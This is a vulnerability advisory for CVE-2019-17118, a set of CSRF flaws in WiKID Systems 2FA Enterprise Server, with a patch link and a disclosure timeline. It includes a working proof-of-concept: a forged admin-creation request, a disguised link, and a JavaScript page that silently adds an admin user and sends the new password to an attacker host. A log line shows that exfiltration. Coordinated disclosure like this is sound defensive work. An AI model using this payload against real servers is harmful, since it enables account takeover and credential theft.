WiKID Systems 2FA Enterprise Server CSRF

CVE-2019-17118

Multiple Cross-Site Request Forgery (CSRF) issues, CVE-2019-17118, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The application did not implement a method of CSRF prevention, consequently, all state changing requests were potentially vulnerable, a sample of affected requests include:

• adm_usrs.jsp?action=add
• adm_usrs.jsp?action=Delete
• processDeviceStatus.jsp? action=Update
• processDeviceStatus.jsp? action=Disable
• processDeviceStatus.jsp? action=Enable
• processDeviceStatus.jsp? action=Delete
• groups.jsp?groupAction=Add
• groups.jsp?groupAction=Delete

Patch

• 4.2.0.b2053: https://downloads.wikidsystems.com/wikid-server-enterprise-4.2.0.b2053-1.noarch.rpm

Timeline

• 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
• 29 Sep 2019 - Issue disclosed to WiKID Systems
• 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
• 16 Oct 2019 - Public Disclosure

Description

Walking through the application revealed that requests did not contain a method of CSRF protection. For example, the request to create an admin user is:

GET /WiKIDAdmin/adm_usrs.jsp?usr=test&newpass1=password1&newpass2=password1&action=Add HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=$COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

The request is not verified as an action intentionally performed by a legitimate user.

This request could be hidden in a link on a page:

<a href="https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1=password1&newpass2=password1&action=Add">WiKIDAdmin Manual</a>

Or in JavaScript that will execute silently in the background:

<html>
 <body>
 <script>
function notify(randomstring)
{
 var xhr = new XMLHttpRequest();
 xhr.open("GET", "https://$LHOST?pass=" + randomstring, true);
 xhr.send();
}


function addUser()
{
 var randomstring = Math.random().toString(36).slice(-12);
 var xhr = new XMLHttpRequest();
 xhr.open("GET", "https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1="+randomstring+"&newpass2="+randomstring+"&action=Add", true);
 xhr.withCredentials = true;
 xhr.send();
 notify(randomstring);
}
addUser();
 </script>
 </body>
</html>

If a user, that is authenticated to the WiKID 2FA Enterprise server application, visits the malicious page, a new admin will be created.

The following demonstrates a user visiting the malicious page, csrf.html, followed by unintentional, background requests to create an admin and send the attacker the password for the new account:

$RHOST - - [14/Oct/2019 04:44:17] "GET /?pass=0.xhd2htmjz1 HTTP/1.1" 200 -